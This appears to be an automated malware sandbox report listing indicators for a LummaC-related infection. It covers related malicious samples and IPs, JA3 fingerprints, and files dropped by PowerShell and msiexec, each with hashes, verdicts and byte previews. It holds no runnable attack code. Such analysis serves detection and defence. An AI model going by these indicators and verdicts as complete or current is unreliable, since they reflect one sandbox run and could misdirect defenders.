CLOUDFLARENETUS	http://mike@mikestavlund.com	Get hash	malicious	Unknown	Browse	104.19.230.21
	file.exe	Get hash	malicious	LummaC	Browse	172.67.155.248
	file.exe	Get hash	malicious	LummaC	Browse	172.67.155.248
	Payment CCF20240531_0002.html	Get hash	malicious	Unknown	Browse	104.16.123.96
	View_alert_details IJPI.html	Get hash	malicious	Unknown	Browse	172.66.0.102
	bootstraper.exe	Get hash	malicious	Unknown	Browse	104.20.23.46
	file.exe	Get hash	malicious	LummaC, Amadey, CredGrabber, Credential Flusher, Cryptbot, LummaC Stealer, Meduza Stealer	Browse	172.67.74.152
	Purchase Order PO.exe	Get hash	malicious	FormBook	Browse	104.21.58.90
	bootstraper.exe	Get hash	malicious	Unknown	Browse	104.20.23.46
	https://app.typeset.com/play/G4WZ1	Get hash	malicious	HTMLPhisher	Browse	104.22.8.215

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	104.21.56.6 172.67.75.40
	file.exe	Get hash	malicious	LummaC	Browse	104.21.56.6 172.67.75.40
	file.exe	Get hash	malicious	LummaC, Amadey, CredGrabber, Credential Flusher, Cryptbot, LummaC Stealer, Meduza Stealer	Browse	104.21.56.6 172.67.75.40
	file.exe	Get hash	malicious	LummaC	Browse	104.21.56.6 172.67.75.40
	file.exe	Get hash	malicious	LummaC	Browse	104.21.56.6 172.67.75.40
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	104.21.56.6 172.67.75.40
	file.exe	Get hash	malicious	LummaC	Browse	104.21.56.6 172.67.75.40
	file.exe	Get hash	malicious	LummaC	Browse	104.21.56.6 172.67.75.40
	file.exe	Get hash	malicious	LummaC	Browse	104.21.56.6 172.67.75.40
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	104.21.56.6 172.67.75.40

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Roaming\QHUPRmIp\AdTree.dll	evhopi.ps1	Get hash	malicious	LummaC	Browse
C:\Users\user\AppData\Roaming\QHUPRmIp\AbRoot.dll	evhopi.ps1	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.7307872139132228
Encrypted:	false
SSDEEP:	3:Nlllul:NllU
MD5:	6DA15BE18F0DF00B9DC2DC6B72B103F2
SHA1:	4ADB8B407D51A20952CB8E4EC0349D742862B568
SHA-256:	19704E2940D1D9E46CF80F36AAB157098B0A8C61865C087167F9AFA9A9F70352
SHA-512:	5BF5FF5A02FA55C13D6DD266361F8DD2747DD657ABF21032E7DD3E9C28D65A3E9CB88F5AE7E6F2029E9FC37D5EA90C020F6423092C84DE41A2AD7E0DCBC72EB4
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\820c64a6

Download File

Process:	C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe
File Type:	data
Category:	dropped
Size (bytes):	1052060
Entropy (8bit):	7.573818272764062
Encrypted:	false
SSDEEP:	24576:F/USTcGoH4HuW7KPkUNDIBDuX4QAWq09GbpAz4V+acLFan:2ST5oYHu3kzBDkPq0stAsvcLF8
MD5:	C82819B7B84926B528BB7B26B04D9489
SHA1:	563CC17B445A335094DCC3B365ECA633C220BA9C
SHA-256:	1026B0DBB4DF48DE1DE8C6CCCEE352379A36F7D0585D937E6E1426D1A9BB5DB5
SHA-512:	E4E5CD33F130BBB91CFBD6082F5220D43DCFC1A62802B02ECD673E0A453C356BF302F3CF0FEAD831C5FCBA0ED1D6432421524212B0F7A5485C7D25B1B355F760
Malicious:	false
Preview:	.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[QB...........+.)61.=-..27&.,../80.{.'.....4>0.6../80..)B.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.4.,./0#.2#'.#YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.4.0.:-'.56.5:'.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.......g..0!.4-./w......:4'.4+).[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.iwr.niu.lYB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB.[YB

C:\Users\user\AppData\Local\Temp\ZZJTWAOIXLEHV8HOYD0ZL8WGES83EVQ.ps1

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	HTML document, ASCII text, with very long lines (8771), with no line terminators
Category:	dropped
Size (bytes):	8771
Entropy (8bit):	6.167199707970035
Encrypted:	false
SSDEEP:	192:PN2x2Bh4cEgp0zbgoEAonbCRT3cpfxX4r8h07tyCN:AxK4cz0zhI4+h07FN
MD5:	A61C682FDBC387DF479A50182D84D74B
SHA1:	C311119D50E25F2192CB5C7ED86A53E25DB24C5D
SHA-256:	A3A6FD3A2D5FA7FEFFC7941D6972FE9DA5B072E7EB5511B1ED4F83137A9417FE
SHA-512:	2036029B7C586BED789F3DD6D97666A256655BBB1F90F3B766443902112B303A9DCED95D9E9D4DCBC98A7EC2FC1F93E4A54A7F001939C5E3D62A11135DE106F7
Malicious:	true
Preview:	<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;font-weight:500;line-height:2.25rem}@media (width <= 720px){.h2{font-size:1.25rem;line-height:1.5rem}}#challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0i

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3nohfash.nnf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ar2ypyri.act.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dbrqwtia.in4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_itjt0g4z.pu0.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o1rv41zv.ppy.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rxa1iyet.ta5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\exdefo

Download File

Process:	C:\Windows\SysWOW64\more.com
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	320512
Entropy (8bit):	6.847458519708181
Encrypted:	false
SSDEEP:	6144:Tm+Z2CfJfzTHXt7pOo24AszzyhCSmcoFevpr7gjMgVuchKKoZK+nc:y+Z2CR/vLtzuhHmlwr7gjMgPdoYT
MD5:	3587D5CD6B70601576844F3E4C97C8C0
SHA1:	37E4A1C7512E1EEBD1BDB22C7AE025A011771C4F
SHA-256:	600F1E09080F154B51043090A03C1DDE8AE3397A18B135ED23A3CE5A0F70BA69
SHA-512:	AE0DD60076B62A297A78BE47F06ECC034A26F1279ED2D6CE9F185A24DAE79690C009176637642EBF7787096FB4B271F17D9F2B957AADCBD6C176FCE112EA1BB3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 51%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....#.Q............................P.............@.......................................@..................................K...................................>...................................................M...............................text............................... ..`.rdata... ...0..."..................@..@.data........`...Z...8..............@....CRT.........p......................@..@.reloc...>.......@..................@..Bfboy................................@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.7254418713403017
Encrypted:	false
SSDEEP:	96:j6bm33CxHRYJkvhkvCCtW9cweDHF9cweDHt:j6qyxYlW9oh9o5
MD5:	BF9F74CE1A0C27330D7C8CBF720FFAB2
SHA1:	A5FAC91696ABAA2376B98B7E3BFE7E7A592D67DC
SHA-256:	6BD473271DAF1C872650B498A875D694940F518897B047293F9844AA9E658941
SHA-512:	9C060AB63C2AA791B7CEF580E5E7B0CC24C23DC36B510FD842795665CF2A2636A7069ADAC6A0E2C53757949C82F061599445AC4D620B07FB9F795C4BD8B2A56A
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v.... ....<..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....t.Q..<..G.4..<......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^vY`\|...........................%..A.p.p.D.a.t.a...B.V.1.....vY\\|..Roaming.@......CW.^vY\\|..........................n...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^vYa\|..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`............................k.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^vYa\|....Q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CS3MH90659BK3BLYD33R.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.7254418713403017
Encrypted:	false
SSDEEP:	96:j6bm33CxHRYJkvhkvCCtW9cweDHF9cweDHt:j6qyxYlW9oh9o5
MD5:	BF9F74CE1A0C27330D7C8CBF720FFAB2
SHA1:	A5FAC91696ABAA2376B98B7E3BFE7E7A592D67DC
SHA-256:	6BD473271DAF1C872650B498A875D694940F518897B047293F9844AA9E658941
SHA-512:	9C060AB63C2AA791B7CEF580E5E7B0CC24C23DC36B510FD842795665CF2A2636A7069ADAC6A0E2C53757949C82F061599445AC4D620B07FB9F795C4BD8B2A56A
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v.... ....<..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....t.Q..<..G.4..<......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^vY`\|...........................%..A.p.p.D.a.t.a...B.V.1.....vY\\|..Roaming.@......CW.^vY\\|..........................n...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^vYa\|..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`............................k.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^vYa\|....Q...........

C:\Users\user\AppData\Roaming\QHUPRmIp\AbRoot.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	364496
Entropy (8bit):	5.879960397997553
Encrypted:	false
SSDEEP:	3072:mB16MsQd1V0rSJkRd2Ygeu1qs93J2FooJafVMkZuP9Dy4s5zTG22+xF0KA6ppDwZ:mBXT1V0WojDy4s5MQV0jw0
MD5:	530957A391C6BC978AE7179179594B12
SHA1:	F174B1575EBC2F6612272CF39215D5DC27EE6B38
SHA-256:	9FBEAB4BCFCEC34DC13CAD90609101B2EA099069AB173555635F174597E4EA09
SHA-512:	9F3DA37B8B8047BCC463C2D12360C6BC99BF35868A14222ABB2108E103BAB5355D1C069D5AC775BD3C7C953A9C8C3299BD61287C4FB7A074F36A4450E95368E2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: evhopi.ps1, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...Zy.Zy.Zy."..Zy.a7x.Zy.a7\|.Zy.a7}.Zy.a7z.Zy....Zy.Zx..Zy.a7p.Zy.a7y.Zy.a7..Zy.a7{.Zy.Rich.Zy.........PE..d....j.].........." .................y..............................................ml....`A.........................................3...>..4r.......p.......@..."...V...9..........@...8............................................................................text...o........................... ..`.rdata..r...........................@..@.data................l..............@....pdata..."...@...$..................@..@.rsrc........p.......6..............@..@.reloc...............:..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\AdTree.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	364496
Entropy (8bit):	5.879960397997553
Encrypted:	false
SSDEEP:	3072:mB16MsQd1V0rSJkRd2Ygeu1qs93J2FooJafVMkZuP9Dy4s5zTG22+xF0KA6ppDwZ:mBXT1V0WojDy4s5MQV0jw0
MD5:	530957A391C6BC978AE7179179594B12
SHA1:	F174B1575EBC2F6612272CF39215D5DC27EE6B38
SHA-256:	9FBEAB4BCFCEC34DC13CAD90609101B2EA099069AB173555635F174597E4EA09
SHA-512:	9F3DA37B8B8047BCC463C2D12360C6BC99BF35868A14222ABB2108E103BAB5355D1C069D5AC775BD3C7C953A9C8C3299BD61287C4FB7A074F36A4450E95368E2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: evhopi.ps1, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...Zy.Zy.Zy."..Zy.a7x.Zy.a7\|.Zy.a7}.Zy.a7z.Zy....Zy.Zx..Zy.a7p.Zy.a7y.Zy.a7..Zy.a7{.Zy.Rich.Zy.........PE..d....j.].........." .................y..............................................ml....`A.........................................3...>..4r.......p.......@..."...V...9..........@...8............................................................................text...o........................... ..`.rdata..r...........................@..@.data................l..............@....pdata..."...@...$..................@..@.rsrc........p.......6..............@..@.reloc...............:..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\QtCore4.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2598912
Entropy (8bit):	6.6049974235008655
Encrypted:	false
SSDEEP:	49152:VTFgiFpGXOENKSgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07/:V+iDaWjxJsv6tWKFdu9CZgfQ
MD5:	FECC62A37D37D9759E6B02041728AA23
SHA1:	0C5F646CAEF7A6E9073D58ED698F6CFBFB2883A3
SHA-256:	94C1395153D7758900979351E633AB68D22AE9B306EF8E253B712A1AAB54C805
SHA-512:	698F90F1248DACBD4BDC49045A4E80972783D9DCEC120D187ABD08F5EF03224B511F7870320938B7E8BE049C243FFB1C450C847429434EF2E2C09288CB9286A6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............,..,..,J.,,..,.<,..,.<(,..,..7,..,..',..,..,..,.<.,...,.<.,...,.</,..,.<.,..,.<),..,Rich..,........................PE..L...T..Q...........!................B..............g..............U...........'......;(...@...........................!.<x..<.!.......&.......................&....................................... .@...............(............................text.............................. ..`.rdata..<...........................@..@.data....2...p&.....Z&.............@....rsrc.........&.......&.............@..@.reloc........&.......&.............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\QtGui4.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8581632
Entropy (8bit):	6.736578346160889
Encrypted:	false
SSDEEP:	98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
MD5:	831BA3A8C9D9916BDF82E07A3E8338CC
SHA1:	6C89FD258937427D14D5042736FDFCCD0049F042
SHA-256:	D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
SHA-512:	BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t...t...t......p.....u...oq.\|...}...q...oq.r...}..c...t.~.....oq.i...oq.....oq.u...oq.u...oq.u...Richt...........PE..L......Q...........!......Y...).....2.S.......Y....e..............U..........P............@...........................m..c...Ul.,.....{.......................{..O..................................x'e.@.............Y..............................text...K.Y.......Y................. ..`.rdata....!...Y...!...Y.............@..@.data...t.....z.......z.............@....rsrc.........{......r{.............@..@.reloc...y....{..z...x{.............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\QtNetwork4.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1053696
Entropy (8bit):	6.539052666912709
Encrypted:	false
SSDEEP:	12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
MD5:	8A2E025FD3DDD56C8E4F63416E46E2EC
SHA1:	5F58FEB11E84AA41D5548F5A30FC758221E9DD64
SHA-256:	52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
SHA-512:	8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.....u...u...u......u..>....u..>....u..>....u...t.".u.......u..>.._.u..>....u..>....u..>....u.Rich..u.........PE..L......Q...........!.....x...........J.............d..............U..........`......I.....@.........................P.......43..d............................ ..........................................@............................................text....v.......x.................. ..`.rdata..H>.......@...\|..............@..@.data...8=..........................@....rsrc...............................@..@.reloc...9... ...:..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\QtXml4.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	356352
Entropy (8bit):	6.447802510709224
Encrypted:	false
SSDEEP:	6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
MD5:	E9A9411D6F4C71095C996A406C56129D
SHA1:	80B6EEFC488A1BF983919B440A83D3C02F0319DD
SHA-256:	C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
SHA-512:	93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......GN.f./.5./.5./.5.W>5./.5.a55./.5..35./.5...5./.5..15./.5./.5...5...5./.5..65./.5..75./.5..05./.5Rich./.5........PE..L...Y..Q...........!.....v..........Z..............a..............U..................k....@..........................w..\...LL..d....0.......................@..hR..................................p...@...............p............................text....t.......v.................. ..`.rdata..............z..............@..@.data........ ......................@....rsrc........0......................@..@.reloc..la...@...b..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6487736
Entropy (8bit):	7.518089126573906
Encrypted:	false
SSDEEP:	98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
MD5:	11C8962675B6D535C018A63BE0821E4C
SHA1:	A150FA871E10919A1D626FFE37B1A400142F452B
SHA-256:	421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
SHA-512:	3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2/m.vN..vN..vN......wN..m..pN..m..zN...6..wN..m..cN...6..aN..vN...J..m..xN..m..$N..m..wN..m..wN..RichvN..................PE..L......e.................(....Z......Y.......@....@..........................0c.......c...@..................................b_.h.....`.8.............b.. ....b.X...PT..............................x.^.@............@..l............................text...r&.......(.................. ..`.rdata....W..@....W..,..............@..@.data...xM...0`.."....`.............@....rsrc...8.....`......<`.............@..@.reloc........b.......a.............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\StarBurn.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	664064
Entropy (8bit):	6.953660087793348
Encrypted:	false
SSDEEP:	12288://gzbnbASodCXNn5FJX5KpN9VmoBBDFxna:HRSoSn5FJX5KP9VmoDW
MD5:	BBF0B66F271322A7C5701D5488D6A6DD
SHA1:	D4978E0CFCB374066BDAEFEA2AACF0417830ED95
SHA-256:	39F8082F72067BE64270647F899919582438A0C7461C439174767B139406ABD8
SHA-512:	A98C6BBB312ECB1BA30DACB39C755DE7F48EE105BB014F51F3096B225EF6A0F73258D7F142965EC94A8F4DBF8DA4D0CEF4E6E3B85D17201236FA7A02555CB532
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
